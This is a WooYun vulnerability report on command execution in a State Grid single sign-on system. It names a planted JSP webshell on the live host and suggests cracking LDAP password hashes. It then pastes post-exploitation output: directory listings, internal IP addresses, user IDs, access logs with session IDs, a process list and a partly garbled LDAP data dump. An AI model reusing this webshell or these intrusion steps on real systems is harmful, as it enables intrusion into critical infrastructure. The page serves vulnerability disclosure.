当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163057

漏洞标题:国家电网公司某重要系统命令执行可内网

相关厂商:国家电网公司

漏洞作者: Forever80s

提交时间:2015-12-21 09:45

修复时间:2016-02-01 10:51

公开时间:2016-02-01 10:51

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-21: 厂商已经确认,细节仅向厂商公开
2015-12-31: 细节向核心白帽子及相关领域专家公开
2016-01-10: 细节向普通白帽子公开
2016-01-20: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

rt

详细说明:

sso 登录系统 使用 cas 基于ldap 下载ldap 数据文件 或用ladpexplorer ,解密 (ldap 一般 使用ssha 作为密码hash算法 ) ,这个系统是认证核心系统。已shell 可内网。
网站http://iscsso.sgcc.com.cn

210.77.176.229:80  中国国家电力信息网
http://iscsso.sgcc.com.cn/isc_sso/login?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2Fsgcis%2Fworkspace%2Fdefault.jsp
shell http://iscsso.sgcc.com.cn/isc_sso/jspspy.jspx
PS F:\> ping iscsso.sgcc.com.cn
Pinging iscsso.sgcc.com.cn [210.77.176.229] with 32 bytes of data:
++++++++++++++++++++++++++++++++++++++++++++
ls
autodeploy
bin
cas.log
cas.log.1
cas.log.2
cas.log.3
config
console-ext
fileRealm.properties
init-info
lib
perfStats.log
security
servers
startManagedWebLogic_readme.txt
startWebLogic.sh
tmp
ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:9A:0D:BE
inet addr:10.3.22.13 Bcast:10.3.22.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:21030644 errors:0 dropped:0 overruns:0 frame:0
TX packets:19477545 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5766569714 (5.3 GiB) TX bytes:13755777092 (12.8 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:23360 errors:0 dropped:0 overruns:0 frame:0
TX packets:23360 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1967649 (1.8 MiB) TX bytes:1967649 (1.8 MiB)
uname -a
Linux iscwwatt3 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
id
uid=400(weblogic) gid=400(bea) groups=400(bea)
/app/weblogic/Oracle/Middleware/user_projects/domains/sso_domain
find -name weblogic.xml
./servers/sso3/stage/isc_sso/isc_sso/WEB-INF/weblogic.xml
./servers/sso3/tmp/_WL_internal/bea_wls_cluster_internal/hoqa3m/war/WEB-INF/weblogic.xml
./servers/sso3/tmp/_WL_internal/bea_wls9_async_response/paujim/war/WEB-INF/weblogic.xml
./servers/sso3/tmp/_WL_internal/bea_wls_internal/d0811e/war/WEB-INF/weblogic.xml
http://iscsso.sgcc.com.cn/isc_sso/jspspy.jspx
tail ./logs/access.log
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.130%3A8103%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8104%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8103%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8101%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "POST /isc_sso/login;jsessionid=ZGt9W22KTK9b5NKLwTXlGx7y5s3T3Cwx3S8T2k4cKnxQ791jhcSv!-2042157050?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2Fsgcis%2Fworkspace%2Fdefault.jsp HTTP/1.1" 302 427
10.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.136%3A8104%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.134%3A8104%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:32 +0800] "POST /isc_sso/login;jsessionid=hpjXW22PQ7qMFG9nVtnz2Lh4BBpfHhQ29CTW2bGgXHppSjD1Yylg!-2042157050?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2F%2Fsgcis HTTP/1.1" 302 385
10.3.22.253 - - [20/Dec/2015:22:42:33 +0800] "GET /isc_sso/serviceValidate?ticket=ST-32842-OthjrbdjjwgHcb7fgEac-cas01.example.org&service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2F%2Fsgcis&filter-name=ValidationFilter HTTP/1.1" 200 639
10.3.22.253 - - [20/Dec/2015:22:42:34 +0800] "GET /isc_sso/f5HealthMonitor.jsp HTTP/1.1" 200 226
root 292 0.0 0.0 0 0 ? S Nov19 0:00 [deferwq]
root 325 0.0 0.0 0 0 ? S Nov19 0:00 [kdmremove]
root 326 0.0 0.0 0 0 ? S Nov19 0:00 [kstriped]
root 430 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_0]
root 431 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_1]
root 438 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_2]
root 439 0.0 0.0 0 0 ? S Nov19 0:00 [vmw_pvscsi_wq_2]
root 590 0.0 0.0 0 0 ? S Nov19 0:00 [kdmflush]
root 592 0.0 0.0 0 0 ? S Nov19 0:00 [kdmflush]
root 616 0.0 0.0 0 0 ? S Nov19 2:34 [jbd2/dm-1-8]
root 617 0.0 0.0 0 0 ? S Nov19 0:00 [ext4-dio-unwrit]
root 701 0.0 0.0 11084 1176 ? S<s Nov19 0:00 /sbin/udevd -d
root 912 0.0 0.0 0 0 ? S Nov19 1:30 [vmmemctl]
root 1383 0.0 0.0 11084 1208 ? S< Nov19 0:00 /sbin/udevd -d
root 1384 0.0 0.0 11080 1196 ? S< Nov19 0:00 /sbin/udevd -d
root 1427 0.0 0.0 0 0 ? S Nov19 0:00 [jbd2/sda1-8]
root 1428 0.0 0.0 0 0 ? S Nov19 0:00 [ext4-dio-unwrit]
root 1470 0.0 0.0 0 0 ? S Nov19 0:06 [kauditd]
root 1630 0.0 0.0 0 0 ? S Nov19 1:14 [flush-253:1]
root 1823 0.0 0.0 179320 4340 ? S Nov19 34:04 /usr/sbin/vmtoolsd
root 1913 0.0 0.0 93176 888 ? S<sl Nov19 0:18 auditd
root 1938 0.0 0.0 251396 3700 ? Sl Nov19 0:10 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
root 1967 0.0 0.0 10948 680 ? Ss Nov19 14:47 irqbalance --pid=/var/run/irqbalance.pid
rpc 1985 0.0 0.0 18976 980 ? Ss Nov19 0:05 rpcbind
dbus 2086 0.0 0.0 21796 1468 ? Ss Nov19 0:31 dbus-daemon --system
root 2113 0.0 0.0 188900 3404 ? Ss Nov19 0:00 cupsd -C /etc/cups/cupsd.conf
root 2141 0.0 0.0 4080 648 ? Ss Nov19 0:00 /usr/sbin/acpid
68 2150 0.0 0.0 38988 3800 ? Ssl Nov19 0:46 hald
root 2151 0.0 0.0 20400 1164 ? S Nov19 0:00 hald-runner
root 2192 0.0 0.0 22520 1084 ? S Nov19 0:00 hald-addon-input: Listening on /dev/input/event2 /dev/input/event0
68 2198 0.0 0.0 18008 1028 ? S Nov19 0:00 hald-addon-acpi: listeni


domain  H誳rclguid       錦B8E0F08095A511E5BF8915D356DCCFDF  垾createTimestamp    
R?01511050030Z l靋reatorsName Dn=Admin 资ou=myrealm,dc=sso_domain
vdc=sso_domain2 遫u @豰yrealm blobjectclass htop organizationalUnit H誳rclguid 氵B8E2290095A511E5BF8915D356DCCFDF 垾createTimestamp
R?01511050030Z l靋reatorsName Dn=Admin " 1鬿u=groups,ou=myrealm,dc=sso_domain 资ou=myrealm,dc=sso_domain3 遫u :)groups blobjectclass organizationalUnit htop H誳rclguid ?B8E2772095A511E5BF8915D356DCCFDF 垾createTimestamp
R?01511050030Z l靋reatorsName Dn=Admin 4 溢cn=Administrators,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain4 R蟤emberURL ?4絣dap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=Administrators,ou=groups,ou=myrealm,dc=sso_domain)) edescription U 杨Administrators can view and modify all resource attributes and start and stop servers blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n ?Administrators H誳rclguid ?B8E29E3095A511E5BF8915D356DCCFDF 垾createTimestamp
R?01511050030Z l靋reatorsName Dn=Admin / cn=Deployers,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain5 R蟤emberURL ?鴅ldap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=Deployers,ou=groups,ou=myrealm,dc=sso_domain)) edescription B 5瓺eployers can view all resource attributes and deploy applications blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n TDeployers H誳rclguid ?B8E2EC5095A511E5BF8915D356DCCFDF 垾createTimestamp
R?01511050030Z l靋reatorsName Dn=Admin / cn=Operators,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain6 R蟤emberURL ?ldap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=Operators,ou=groups,ou=myrealm,dc=sso_domain)) edescription R 縧Operators can view all resource attributes and perform server lifecycle operations blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n UOperators H誳rclguid ?B8E33A7095A511E5BF8915D356DCCFDF 垾createTimestamp
R?01511050030Z l靋reatorsName Dn=Admin . 漑cn=Monitors,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain7 R蟤emberURL ?陸ldap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=Monitors,ou=groups,ou=myrealm,dc=sso_domain)) edescription X 餱Monitors can view all resource attributes and perform operations not restricted by roles blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n L錗onitors H誳rclguid 阄B8E3618095A511E5BF8915D356DCCFDF 垾createTimestamp
R?01511050030Z l靋reatorsName Dn=Admin 0 甁cn=AppTesters,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain8 R蟤emberURL ?vldap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=AppTesters,ou=groups,ou=myrealm,dc=sso_domain)) edescription 7 ?AppTesters can test applications that are in admin mode blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n
^@AppTesters H誳rclguid 栀B8E3AFA095A511E5BF8915D356DCCFDF 垾createTimestamp
R?01511050030Z l靋reatorsName Dn=Admin ; 癱n=CrossDomainConnectors,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain9 R蟤emberURL ?別ldap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=CrossDomainConnectors,ou=groups,ou=myrealm,dc=sso_domain)) edescription 8 ?CrossDomainConnectors can communicate with other domains blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n 罖CrossDomainConnectors H誳rclguid ?B8E3FDC095A511E5BF8915D356DCCFDF 垾createTimestamp
R?01511050030Z l靋reatorsName Dn=Admin 7 闖cn=AdminChannelUsers,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain10

漏洞证明:

修复方案:

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-21 11:22

厂商回复:

感谢提交

最新状态:

2015-12-31:感谢帮助,请联系厂商获取礼品。